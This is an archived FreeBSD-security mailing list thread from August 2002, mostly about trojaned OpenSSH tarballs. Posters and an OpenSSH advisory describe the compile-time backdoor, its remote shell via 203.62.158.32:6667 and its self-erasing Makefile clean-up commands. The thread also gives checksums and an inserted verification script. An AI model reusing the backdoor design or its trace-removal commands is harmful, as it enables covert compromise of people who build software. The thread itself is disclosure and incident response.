    6: -- used as an interjection to express surprise, doubt, or incredulity

DES
-- 
Dag-Erling Smorgrav - des@ofug.org

From owner-freebsd-security Thu Aug 1 05:46:34 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id D0BAB37B405; Thu, 1 Aug 2002 05:46:26 -0700 (PDT)
Received: from blues.jpj.net (blues.jpj.net [208.210.80.156]) by mx1.FreeBSD.org (Postfix) with ESMTP id CB13843F6F; Thu, 1 Aug 2002 05:38:12 -0700 (PDT) (envelope-from trevor@jpj.net)
Received: from blues.jpj.net (localhost.jpj.net [127.0.0.1]) by blues.jpj.net (8.12.3/8.12.3) with ESMTP id g71CcBot026101; Thu, 1 Aug 2002 08:38:11 -0400 (EDT) (envelope-from trevor@jpj.net)
Received: from localhost (trevor@localhost) by blues.jpj.net (8.12.3/8.12.3/Submit) with ESMTP id g71CcBhr026098; Thu, 1 Aug 2002 08:38:11 -0400 (EDT)
X-Authentication-Warning: blues.jpj.net: trevor owned process doing -bs
Date: Thu, 1 Aug 2002 08:38:11 -0400 (EDT)
From: Trevor Johnson
To: Dag-Erling Smorgrav
Cc: Mike Tancsa, Ruslan Ermilov,
Subject: Re: Default ssh protocol in -STABLE [was: HEADS UP: FreeBSD-STABLE now has OpenSSH 3.4p1]
Message-ID: <20020801083631.H19455-100000@blues.jpj.net>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On 1 Aug 2002, Dag-Erling Smorgrav wrote:

> Trevor Johnson writes:
> > This is the section of http://www.openbsd.org/security.html#default which
> > I had hoped you would read:
> > [...]
>
> This is the section of Webster's 7th edition dictionary which I had
> hoped you would read:
>
>   1. no \(')n{o-}\ av [ME, fr. OE n{a-}, fr. ne not +
>   {a-} always; akin to ON & OHG ne not, L ne-, Gk
>   n{e-}- -- more at AYE] chiefly Scot
>     1a: NOT

Why not? Do you have a reason?

>     1b: -- used as a function word to express the negative of an alternative
>     choice or possibility
>     2: in no respect or degree -- used in comparisons
>     3: not so -- used to express negation, dissent, denial, or refusal

How do you dissent?
>     4: -- used with a following adjective to imply a meaning expressed by the
>     opposite positive statement <~ uncertain terms>
>     5: -- used as a function word to emphasize a following negative or to
>     introduce a more emphatic, explicit, or comprehensive statement
>     6: -- used as an interjection to express surprise, doubt, or incredulity

-- 
Trevor Johnson

From owner-freebsd-security Thu Aug 1 05:58:36 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 6A21437B407 for ; Thu, 1 Aug 2002 05:58:29 -0700 (PDT)
Received: from yoda.bph.ruhr-uni-bochum.de (yoda.bph.ruhr-uni-bochum.de [134.147.196.7]) by mx1.FreeBSD.org (Postfix) with ESMTP id 2572943E4A for ; Thu, 1 Aug 2002 05:58:28 -0700 (PDT) (envelope-from cwe@bph.ruhr-uni-bochum.de)
Received: from gonzo (gonzo [134.147.196.22]) by yoda.bph.ruhr-uni-bochum.de (8.8.8/8.8.8) with SMTP id OAA04090; Thu, 1 Aug 2002 14:58:26 +0200
From: Christoph Wegener
To: "Naga Suresh B"
Cc: security@freebsd.org
Date: Thu, 01 Aug 2002 14:58:26 +0200
X-Priority: 3 (Normal)
Organization: Lehrstuhl fuer Biophysik - Ruhr-Universitaet Bochum
In-Reply-To: <016301c23957$7d8436f0$9600a8c0@blraddrcom>
Subject: Re: openssh-3.4p1.tar.gz trojaned
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
X-Mailer: Opera 6.04 build 1135
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hi,

what do you mean?!?

If you mean whether another trojaned host will attack you, I can say that the trojan code we saw this morning has a hardcoded IP address (203.62.158.32:6667, which is secured now) so you will be safe - at least for now...

If you mean how you can find out if your host was trojaned, please read the archived mails from today...

Cheers
Christoph

1.8.2002 14:32:22, "Naga Suresh B" wrote:

>How can we find out whether the trojan attacked our server or not?

-- 
  .-.                          Ruhr-Universitaet Bochum
  /v\    L I N U X             Lehrstuhl fuer Biophysik
 // \\   >Penguin Computing<   c/o Christoph Wegener
/(   )\                        Gebaeude ND 04/Nord
 ^^-^^                         D-44780 Bochum, GERMANY

Tel: +49 (234) 32-25754   Fax: +49 (234) 32-14626
mailto:cwe@bph.ruhr-uni-bochum.de   http://www.bph.ruhr-uni-bochum.de

From owner-freebsd-security Thu Aug 1 06:23:13 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 9BE3E37B400 for ; Thu, 1 Aug 2002 06:23:09 -0700 (PDT)
Received: from thuis.c00lb0x.com (c00lb0x.xs4all.nl [213.84.119.178]) by mx1.FreeBSD.org (Postfix) with ESMTP id CA68143E6E for ; Thu, 1 Aug 2002 06:22:59 -0700 (PDT) (envelope-from tbonex@c00lb0x.com)
Received: from mydomain.com (localhost [127.0.0.1]) by thuis.c00lb0x.com (8.12.4/8.12.4/Debian-4) with SMTP id g71DN5cC027525 for ; Thu, 1 Aug 2002 15:23:06 +0200
Received: from 192.168.2.106 (SquirrelMail authenticated user tbonex) by mail.kdevries.com with HTTP; Thu, 1 Aug 2002 15:23:07 +0200 (CEST)
Message-ID: <1692.192.168.2.106.1028208187.squirrel@mail.kdevries.com>
Date: Thu, 1 Aug 2002 15:23:07 +0200 (CEST)
Subject: Re: openssh-3.4p1.tar.gz trojaned
From: "DaMastah"
X-Priority: 3
Importance: Normal
X-MSMail-Priority: Normal
X-Mailer: SquirrelMail (version 1.2.7)
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hi,

I just updated a couple of servers to openssh
3.4p1 (portable version) running solaris/debian patched with a chroot-patch.

I have checked all tar-balls (freshly extracted) and there aren't any bf-test.c files. Does that mean I was just in time with the right source code (I downloaded it around 14:00 CET) and that I am trojan clean?

Furthermore, when will we know that a clean version has been released? Are there any more ways to check for the trojaned version?

Thanks
Kevin de Vries

From owner-freebsd-security Thu Aug 1 06:32:09 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id E78D437B400 for ; Thu, 1 Aug 2002 06:32:03 -0700 (PDT)
Received: from mel-rto6.wanadoo.fr (smtp-out-6.wanadoo.fr [193.252.19.25]) by mx1.FreeBSD.org (Postfix) with ESMTP id 10CD843E5E for ; Thu, 1 Aug 2002 06:32:03 -0700 (PDT) (envelope-from patpro@patpro.net)
Received: from mel-rta8.wanadoo.fr (193.252.19.79) by mel-rto6.wanadoo.fr (6.5.007) id 3D18683701333A92 for security@freebsd.org; Thu, 1 Aug 2002 15:32:01 +0200
Received: from [192.168.0.22] (80.11.166.151) by mel-rta8.wanadoo.fr (6.5.007) id 3D2A78F600AAFA87 for security@freebsd.org; Thu, 1 Aug 2002 15:32:01 +0200
User-Agent: Microsoft-Entourage/9.0.2509
Date: Thu, 01 Aug 2002 15:32:00 +0200
Subject: Re: openssh-3.4p1.tar.gz trojaned
From: patpro
In-Reply-To: <1692.192.168.2.106.1028208187.squirrel@mail.kdevries.com>
Mime-version: 1.0
Content-type: text/plain; charset="ISO-8859-1"
Content-transfer-encoding: quoted-printable
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On 1/08/02 15:23, DaMastah at tbonex@c00lb0x.com wrote:

> Hi,
>
> I just updated a couple of servers to openssh 3.4p1 (portable version)
> running solaris/debian patched with a chroot-patch.

by the way, does the trojan run on debian and/or solaris? I've been told it's only x86 code for BSDs and won't run on linux; is any detailed compatibility info available?

patpro

From owner-freebsd-security Thu Aug 1 06:54:50 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 356B737B400 for ; Thu, 1 Aug 2002 06:54:47 -0700 (PDT)
Received: from cithaeron.argolis.org (pool-138-88-142-95.esr.east.verizon.net [138.88.142.95]) by mx1.FreeBSD.org (Postfix) with ESMTP id 0AB6743E88 for ; Thu, 1 Aug 2002 06:54:46 -0700 (PDT) (envelope-from piechota@argolis.org)
Received: from cithaeron.argolis.org (localhost [127.0.0.1]) by cithaeron.argolis.org (8.12.5/8.12.5) with ESMTP id g71DGsw4091112; Thu, 1 Aug 2002 09:16:54 -0400 (EDT) (envelope-from piechota@argolis.org)
Received: from localhost (piechota@localhost) by cithaeron.argolis.org (8.12.5/8.12.5/Submit) with ESMTP id g71DGr7U091109; Thu, 1 Aug 2002 09:16:54 -0400 (EDT)
X-Authentication-Warning: cithaeron.argolis.org: piechota owned process doing -bs
Date: Thu, 1 Aug 2002 09:16:53 -0400 (EDT)
From: Matt Piechota
To: Artur Lindgren
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Trojan located in latest openssh tar files
Message-ID: <20020801091503.H91087-100000@cithaeron.argolis.org>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, 1 Aug 2002, Artur Lindgren wrote:

> It runs once, upon compilation of openssh, and is named sh or the
> compiling user's default shell in the process listing.
> This trojan attempts to connect to 203.62.158.32:6667 (hacked machine
> which has been secured now),
> and awaits one of three characters as the command;
> D execs /bin/sh
> M respawns
> A kills the daemon
> The /bin/sh executed via the D command was controlled by the daemon
> listening on 203.62.158.32:6667, potentially meaning that
> people affected by this have given a shell, possibly root, to user unknown.

Sounds like it'd only work for the current boot of the machine? Or does it hide somewhere and persist after reboot?

-- 
Matt Piechota

From owner-freebsd-security Thu Aug 1 07:14:56 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id B297037B400 for ; Thu, 1 Aug 2002 07:14:52 -0700 (PDT)
Received: from mail.comitnet.com (skiffer.comitnet.com [212.181.63.123]) by mx1.FreeBSD.org (Postfix) with SMTP id 41BA343E70 for ; Thu, 1 Aug 2002 07:14:51 -0700 (PDT) (envelope-from bond@comitnet.se)
Received: (qmail 3060 invoked from network); 1 Aug 2002 14:14:56 -0000
Received: from unknown (HELO ?192.168.57.109?)
(212.181.63.111) by 212.181.63.98 with SMTP; 1 Aug 2002 14:14:56 -0000
Mime-Version: 1.0
X-Sender: bond%comitnet.se@pop3.comitnet.com
In-Reply-To: <20020801091503.H91087-100000@cithaeron.argolis.org>
References: <20020801091503.H91087-100000@cithaeron.argolis.org>
Date: Thu, 1 Aug 2002 16:13:59 +0200
To: Matt Piechota
From: Artur Lindgren
Subject: Re: Trojan located in latest openssh tar files
Cc: freebsd-security@FreeBSD.ORG
Content-Type: text/plain; charset="us-ascii" ; format="flowed"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

>On Thu, 1 Aug 2002, Artur Lindgren wrote:
>
>> It runs once, upon compilation of openssh, and is named sh or the
>> compiling user's default shell in the process listing.
>> This trojan attempts to connect to 203.62.158.32:6667 (hacked machine
>> which has been secured now),
>> and awaits one of three characters as the command;
>> D execs /bin/sh
>> M respawns
>> A kills the daemon
>> The /bin/sh executed via the D command was controlled by the daemon
>> listening on 203.62.158.32:6667, potentially meaning that
>> people affected by this have given a shell, possibly root, to user unknown.
>
>Sounds like it'd only work for the current boot of the machine? Or does
>it hide somewhere and persist after reboot?
>
>-- 
>Matt Piechota

As I wrote, it runs once upon compilation :-)

/Artur Lindgren

From owner-freebsd-security Thu Aug 1 07:32:34 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 23DCA37B400 for ; Thu, 1 Aug 2002 07:32:29 -0700 (PDT)
Received: from mailout03.sul.t-online.com (mailout03.sul.t-online.com [194.25.134.81]) by mx1.FreeBSD.org (Postfix) with ESMTP id 81AD343E7B for ; Thu, 1 Aug 2002 07:32:28 -0700 (PDT) (envelope-from corecode@corecode.ath.cx)
Received: from fwd10.sul.t-online.de by mailout03.sul.t-online.com with smtp id 17aH07-0003J8-07; Thu, 01 Aug 2002 16:32:27 +0200
Received: from spirit.zuhause.stoert.net (320050403952-0001@[80.128.125.94]) by fmrl10.sul.t-online.com with esmtp id 17aH05-1POFfcC; Thu, 1 Aug 2002 16:32:25 +0200
Received: from terrorfish.uni.stoert.net (terrorfish.uni.stoert.net [10.150.180.178]) by spirit.zuhause.stoert.net (8.11.6/8.11.6) with ESMTP id g71EWPQ28116 for ; Thu, 1 Aug 2002 16:32:25 +0200 (CEST) (envelope-from corecode@corecode.ath.cx)
Received: from terrorfish.uni.stoert.net (localhost [127.0.0.1]) by terrorfish.uni.stoert.net (8.12.5/8.12.5) with ESMTP id g71EVRF0000631 for ; Thu, 1 Aug 2002 16:31:27 +0200 (CEST) (envelope-from corecode@terrorfish.uni.stoert.net)
Received: (from corecode@localhost) by terrorfish.uni.stoert.net (8.12.5/8.12.5/Submit) id g71EVRQf000630; Thu, 1 Aug 2002 16:31:27 +0200 (CEST) (envelope-from corecode)
Date: Thu, 1 Aug 2002 16:31:21 +0200
From: "Simon 'corecode' Schubert"
To: security@freebsd.org
Subject: keep the noise low!
Message-Id: <20020801163121.6e2be57b.corecode@corecode.ath.cx>
Reply-To: corecode@corecode.ath.cx
X-Mailer: Sylpheed version 0.8.0claws (GTK+ 1.2.10; i386-portbld-freebsd5.0)
Mime-Version: 1.0
Content-Type: multipart/signed; protocol="application/pgp-signature"; micalg=pgp-sha1; boundary="=.imcQ6b'9k,4nXE"
X-Sender: 320050403952-0001@t-dialin.net
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

--=.imcQ6b'9k,4nXE
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit

ok guys, could you please keep the noise low?

the tarball of openssh located on the openbsd site is trojaned, so WHAT? our port got the right checksum, the base system isn't trojaned either. WHY BOTHER? AND DON'T SEND THAT STUFF OVER AND OVER AGAIN!

T * FREEBSD NOT VULNERABLE DUE TO TROJANED FILE ON OPENBSD.ORG
K THX

thank you for your attention. replies to me, not to the list.

-- 
/"\   http://corecode.ath.cx/#donate
\ /   \ ASCII Ribbon Campaign
/ \    Against HTML Mail and News

--=.imcQ6b'9k,4nXE
Content-Type: application/pgp-signature

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (FreeBSD)

iD8DBQE9SUY/r5S+dk6z85oRAnz3AKDXPu//80h109t4bEabAlPODHp3GwCfTNE1
OkS8HYwErKW9r+UFs8yH9rc=
=YRfJ
-----END PGP SIGNATURE-----

--=.imcQ6b'9k,4nXE--

From owner-freebsd-security Thu Aug 1 08:23:55 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id AB96E37B400 for ; Thu, 1 Aug 2002 08:23:51 -0700 (PDT)
Received: from treebeardmail.webcorelabs.com (dns2.webcorelabs.com [209.115.232.141]) by mx1.FreeBSD.org (Postfix) with SMTP id DE66D43E42 for ; Thu, 1 Aug 2002 08:23:50 -0700 (PDT) (envelope-from chad@evolvs.com)
Received: (qmail 1956 invoked by uid 0); 1 Aug 2002 15:23:50 -0000
Received: from unknown (HELO quaker) (209.115.232.130) by localhost with SMTP; 1 Aug 2002 15:23:50 -0000
From: chad
To: freebsd-security@FreeBSD.ORG
Date: Thu, 01 Aug 2002 09:23:50 -0600
X-Priority: 3 (Normal)
Reply-To: chad@evolvs.com
Organization: www.evolvs.com
In-Reply-To: <20020801201132.98EF.KONNO@hal.rcast.u-tokyo.ac.jp>
Message-Id: <41JEYTHBOJMJA6RPKI73QOYTS62HCC7.3d495286@quaker>
Subject: Re: openssh-3.4p1.tar.gz trojaned
MIME-Version: 1.0
Content-Type: text/plain; charset="US-ASCII"
X-Mailer: Opera 6.03 build 1107
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

I just upgraded my OpenBSD 3.0 machine to OpenSSH 3.4 last night. I downloaded openssh-3.4.tgz (notice: not p1).
The MD5 I got was

  MD5 (openssh-3.4.tgz) = bda7c80825d9d9f35f17046ed90e1b0a

And look:

  [root@superfrink /root/upgrades]# tar -tzf openssh-3.4.tgz | grep bf
  ssh/ssh-keygen/bf-test.c

And then:

  [root@superfrink /root/upgrades]# head -5 ssh/ssh-keygen/bf-test.c
  /*
   * Blowfish input vectors are handled incorrectly on HP-UX PL.2 systems.
   * Perform routine compatability checks.
   */
  #include

So I guess it's not just openssh-3.4p1.tar.gz that is trojaned.

/Chad

8/1/2002 5:19:52 AM, Shunichi Konno wrote:

>Hello.
>
>Thank you for your comment, but there was no such problem. :)
>I checked whether it was trojaned or not after I extracted openssh-3.4.tgz.
>
>And I know too, that "bf-test.out", which is the shell script made
>by bf-test.c, will change Makefile and Makefile.in, and remove
>bftest* like this:
>
>  grep -v -i bf-test Makefile.in > m.out ; cp m.out Makefile.in ; rm -f m.out
>  grep -v -i bf-test Makefile > m.out ; cp m.out Makefile ; rm -f m.out
>  rm -f bf-test*
>
>
>On Thu, 01 Aug 2002 12:55:46 +0200
>Christoph Wegener wrote:
>CW> but be careful: you have to check it with the original tgz-file, because the shell script removes every trace of itself from the archive once you
>CW> have installed. So taking your tree and making a tgz is NO solution to test...
>
>
>
>----------
>KONNO Shunichi

From owner-freebsd-security Thu Aug 1 08:25:21 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id DC2F437B400 for ; Thu, 1 Aug 2002 08:25:15 -0700 (PDT)
Received: from citi.umich.edu (citi.umich.edu [141.211.92.141]) by mx1.FreeBSD.org (Postfix) with ESMTP id 79E5D43E42 for ; Thu, 1 Aug 2002 08:25:15 -0700 (PDT) (envelope-from provos@citi.umich.edu)
Received: by citi.umich.edu (Postfix, from userid 104123) id 85495207C3; Thu, 1 Aug 2002 11:25:11 -0400 (EDT)
Date: Thu, 1 Aug 2002 11:25:11 -0400
From: Niels Provos
To: freebsd-security@freebsd.org
Subject: OpenSSH Security Advisory: Trojaned Distribution Files
Message-ID: <20020801152511.GJ6925@citi.citi.umich.edu>
Mail-Followup-To: freebsd-security@freebsd.org
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="tmoQ0UElFV5VgXgH"
Content-Disposition: inline
User-Agent: Mutt/1.3.27i
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

--tmoQ0UElFV5VgXgH
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

OpenSSH Security Advisory (adv.trojan)

1. Systems affected:

OpenSSH version 3.2.2p1, 3.4p1 and 3.4 have been trojaned on the OpenBSD ftp server and potentially propagated via the normal mirroring process to other ftp servers. The code was inserted some time between the 30th and 31st of July. We replaced the trojaned files with their originals at 7AM MDT, August 1st.

2. Impact:

Anyone who has installed OpenSSH from the OpenBSD ftp server or any mirror within that time frame should consider his system compromised.
The trojan allows the attacker to gain control of the system as the user compiling the binary. Arbitrary commands can be executed. 3. Solution: Verify that you did not build a trojaned version of the sources. The portable SSH tar balls contain PGP signatures that should be verified before installation. You can also use the following MD5 checksums for verification. MD5 (openssh-3.4p1.tar.gz) =3D 459c1d0262e939d6432f193c7a4ba8a8=20 MD5 (openssh-3.4p1.tar.gz.sig) =3D d5a956263287e7fd261528bb1962f24c MD5 (openssh-3.4.tgz) =3D 39659226ff5b0d16d0290b21f67c46f2 MD5 (openssh-3.2.2p1.tar.gz) =3D 9d3e1e31e8d6cdbfa3036cb183aa4a01 MD5 (openssh-3.2.2p1.tar.gz.sig) =3D be4f9ed8da1735efd770dc8fa2bb808a 4. Details When building the OpenSSH binaries, the trojan resides in bf-test.c and causes code to execute which connects to a specified IP address. The destination port is normally used by the IRC protocol. A connection attempt is made once an hour. If the connection is successful, arbitrary commands may be executed. Three commands are understood by the backdoor: Command A: Kill the exploit. Command D: Execute a command. Command M: Go to sleep. 5. Notice: Because of the urgency of this issue, the advisory may not be complete. Updates will be posted to the OpenSSH web pages if necessary. 
--tmoQ0UElFV5VgXgH Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (OpenBSD) Comment: For info see http://www.gnupg.org iQEVAwUBPUlS1zZ8FqYKL4flAQH+hggAtovk2Gniptltsj9aBa2CpeLJuRm5lKq0 JgVcTer+qb4yszNxeE2/cbi5LERoF/MC3dkNELnf7MMJnAc4u3/Ibu0NRRp5UzNt nqhdshjm7vhepZftOJrbTNT7QwlmkoQdNsape8cm/JOGqx0y3sPpy3g+6ymdBdkL 4KX/RTXNAksW0jWUP7+xILNvxGk8CyJrRtheSKIdIpKphU7zlltHbceqIL47UeXt KInJzEabQ3i0WtoAV1qrUH3toKiqxRl7XHstuUGGu4G/R/plzqaGWKaR+qI5VYda PPg+J9iT53VjZYoxuyiD8sBOnIVPfcBTY9ws6OetNY5S/qDIZvX6WQ== =cpyg -----END PGP SIGNATURE----- --tmoQ0UElFV5VgXgH-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 1 8:31:37 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id B2D9B37B400 for ; Thu, 1 Aug 2002 08:31:31 -0700 (PDT) Received: from thoth.sbs.de (thoth.sbs.de [192.35.17.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 7D8B443E42 for ; Thu, 1 Aug 2002 08:31:30 -0700 (PDT) (envelope-from ust@cert.siemens.de) Received: from mail1.siemens.de (mail1.siemens.de [139.23.33.14]) by thoth.sbs.de (8.11.6/8.11.6) with ESMTP id g71FVQE16809; Thu, 1 Aug 2002 17:31:27 +0200 (MEST) Received: from mars.cert.siemens.de (ust.mchp.siemens.de [139.23.201.17]) by mail1.siemens.de (8.11.6/8.11.6) with ESMTP id g71FVQU13204; Thu, 1 Aug 2002 17:31:26 +0200 (MEST) Received: from alaska.cert.siemens.de (alaska.cert.siemens.de [139.23.202.134]) by mars.cert.siemens.de (8.12.5/8.12.5/Siemens CERT [ $Revision: 1.25 ]) with ESMTP id g71FVQoB000625; Thu, 1 Aug 2002 17:31:26 +0200 (CEST) (envelope-from ust@alaska.cert.siemens.de) Received: from alaska.cert.siemens.de (alaska.cert.siemens.de [127.0.0.1]) by alaska.cert.siemens.de (8.12.5/8.12.5/alaska [ $Revision: 1.14 ]) with ESMTP id g71FVQqa002557; Thu, 1 Aug 2002 17:31:26 
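An added shell check, not part of the advisory or of any post in this thread, that does what Chad, Christoph Wegener and the advisory together describe: compare a downloaded archive's MD5 against the advisory's published list and look for the bf-test indicator in the original archive rather than in an extracted tree (whose Makefile the trojan cleans up after itself). It assumes a POSIX sh with tar plus either GNU md5sum or BSD md5; the archive basename is used to select the expected checksum.

```shell
#!/bin/sh
# Added example (not the advisory's or the OpenSSH project's code).
# Checks an OpenSSH archive against the advisory's MD5 list and lists any
# bf-test file inside the ORIGINAL archive, as Wegener's note requires.
# Assumes: tar, and md5sum (GNU) or md5 (BSD) on the PATH.

# Known-good checksums as published in the OpenSSH advisory (adv.trojan).
GOOD_MD5="openssh-3.4p1.tar.gz 459c1d0262e939d6432f193c7a4ba8a8
openssh-3.4p1.tar.gz.sig d5a956263287e7fd261528bb1962f24c
openssh-3.4.tgz 39659226ff5b0d16d0290b21f67c46f2
openssh-3.2.2p1.tar.gz 9d3e1e31e8d6cdbfa3036cb183aa4a01
openssh-3.2.2p1.tar.gz.sig be4f9ed8da1735efd770dc8fa2bb808a"

# Print the MD5 of a file on either a GNU or a BSD userland.
file_md5() {
    if command -v md5sum >/dev/null 2>&1; then
        md5sum "$1" | cut -d' ' -f1
    else
        md5 -q "$1"
    fi
}

# Expected MD5 for an archive, selected by its basename; empty if unknown.
expected_md5() {
    printf '%s\n' "$GOOD_MD5" | awk -v n="$1" '$1 == n { print $2 }'
}

# Prints one verdict per check:
#   MD5:OK | MD5:MISMATCH | MD5:UNKNOWN-FILE
#   BFTEST:CLEAN | BFTEST:FOUND <archive member(s)>
# Returns 0 only when the checksum matches and no bf-test member exists.
check_openssh_archive() {
    archive=$1
    name=$(basename "$archive")
    rc=0
    want=$(expected_md5 "$name")
    have=$(file_md5 "$archive")
    if [ -z "$want" ]; then
        echo "MD5:UNKNOWN-FILE"; rc=1
    elif [ "$want" = "$have" ]; then
        echo "MD5:OK"
    else
        echo "MD5:MISMATCH"; rc=1
    fi
    # The trojan was carried in ssh/ssh-keygen/bf-test.c; a clean archive
    # has no member with bf-test in its name at all.
    hits=$(tar -tzf "$archive" | grep -i 'bf-test' || true)
    if [ -z "$hits" ]; then
        echo "BFTEST:CLEAN"
    else
        echo "BFTEST:FOUND $hits"; rc=1
    fi
    return $rc
}
```

The PGP signature check the advisory recommends is the stronger verification; the MD5 comparison above only catches the specific swap the advisory describes.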
From: Udo Schweigert
To: chad
Cc: freebsd-security@FreeBSD.ORG
Date: Thu, 1 Aug 2002 17:31:26 +0200
Subject: Re: openssh-3.4p1.tar.gz trojaned

On Thu, Aug 01, 2002 at 09:23:50 -0600, chad wrote:
> I just upgraded my OpenBSD 3.0 machine to OpenSSH 3.4 last night.
> I downloaded openssh-3.4.tgz ( notice not p1 ). The MD5 I got was
>
> MD5 (openssh-3.4.tgz) = bda7c80825d9d9f35f17046ed90e1b0a
>
> And look :
>
> [root@superfrink /root/upgrades]# tar -tzf openssh-3.4.tgz | grep bf
> ssh/ssh-keygen/bf-test.c
>
> And then:
>
> [root@superfrink /root/upgrades]# head -5 ssh/ssh-keygen/bf-test.c
> /*
> * Blowfish input vectors are handled incorrectly on HP-UX PL.2 systems.
> * Perform routine compatability checks.
> */
> #include
>
> So I guess It's not just openssh-3.4p1.tar.gz that is trojaned.
>

The following changes occurred to ftp.openssh.com:

Old size -> new size   name
398595   -> 401466     openssh-3.4.tgz
822567   -> 825630     portable/openssh-3.2.2p1.tar.gz
837668   -> 840574     portable/openssh-3.4p1.tar.gz

So the portable versions 3.4 and 3.2.2 as well as the "native" 3.4 were
affected. Meanwhile all 3 have been replaced by the original versions.

Best regards
--
Udo Schweigert, Siemens AG   | Voice : +49 89 636 42170
CT IC CERT, Siemens CERT     | Fax   : +49 89 636 41166
D-81730 Muenchen / Germany   | email : udo.schweigert@siemens.com

From: Holt Grendal
To: security@freebsd.org
Date: Thu, 1 Aug 2002 08:46:03 -0700 (PDT)
Subject: How was ftp.openbsd.org compromised?

How was ftp.openbsd.org compromised?

Anything we need to worry about?
From: Pete Ehlke
To: Holt Grendal
Cc: security@freebsd.org
Date: Thu, 1 Aug 2002 10:50:18 -0500
Subject: Re: How was ftp.openbsd.org compromised?

On Thu, Aug 01, 2002 at 08:46:03AM -0700, Holt Grendal wrote:
> How was ftp.openbsd.org compromised?
>
> Anything we need to worry about?
>
massively off topic here, but I suspect it has something to do with this:

bastet[~]$ ftp ftp.openbsd.org
[snip]
220 merlin FTP server (SunOS 4.1) ready.

From: Mike Tancsa
To: Holt Grendal, security@FreeBSD.ORG
Date: Thu, 01 Aug 2002 11:53:59 -0400
Subject: Re: How was ftp.openbsd.org compromised?

Note the OS

220 merlin FTP server (SunOS 4.1) ready.
Name (ftp.openbsd.org:mdtancsa):

At 08:46 AM 01/08/2002 -0700, Holt Grendal wrote:
>How was ftp.openbsd.org compromised?
>
>Anything we need to worry about?

From: Shunichi Konno
To: security@freebsd.org
Date: Fri, 02 Aug 2002 00:57:11 +0900
Subject: Re: How was ftp.openbsd.org compromised?

Sorry for posting an off-topic mail.

Read this:

8.18 - Why does www.openbsd.org run on Solaris?
http://www.OpenBSD.org/faq/faq8.html#wwwsolaris

From: "Peter C. Lai"
To: Trevor Johnson
Cc: Dag-Erling Smorgrav, Mike Tancsa, Ruslan Ermilov, security@FreeBSD.ORG
Date: Thu, 1 Aug 2002 12:40:49 -0400
Subject: Re: Default ssh protocol in -STABLE [was: HEADS UP: FreeBSD-STABLE now has OpenSSH 3.4p1]

On Thu, Aug 01, 2002 at 08:38:11AM -0400, Trevor Johnson wrote:
> On 1 Aug 2002, Dag-Erling Smorgrav wrote:
>
> > Trevor Johnson writes:
> > > This is the section of http://www.openbsd.org/security.html#default which
> > > I had hoped you would read:
> > > [...]
> >
> > This is the section of Webster's 7th edition dictionary which I had
> > hoped you would read:
> >
> > 1. no \(')n{o-}\ av [ME, fr. OE n{a-}, fr. ne not + {a-} always; akin to
> > ON & OHG ne not, L ne-, Gk n{e-}- -- more at AYE] chiefly Scot
> > 1a: NOT
>
> Why not? Do you have a reason?

Production level reasons.

1. We already stated that it would be difficult for management of large
installations to do this.

2. Stable is supposed to be stable. We've still got lots of people on 4.2, 4.3,
4.4, and 4.5 out there who are living quite nicely with their setups. We've got
people whose installation is destined to sit in a corner to gather dust and do
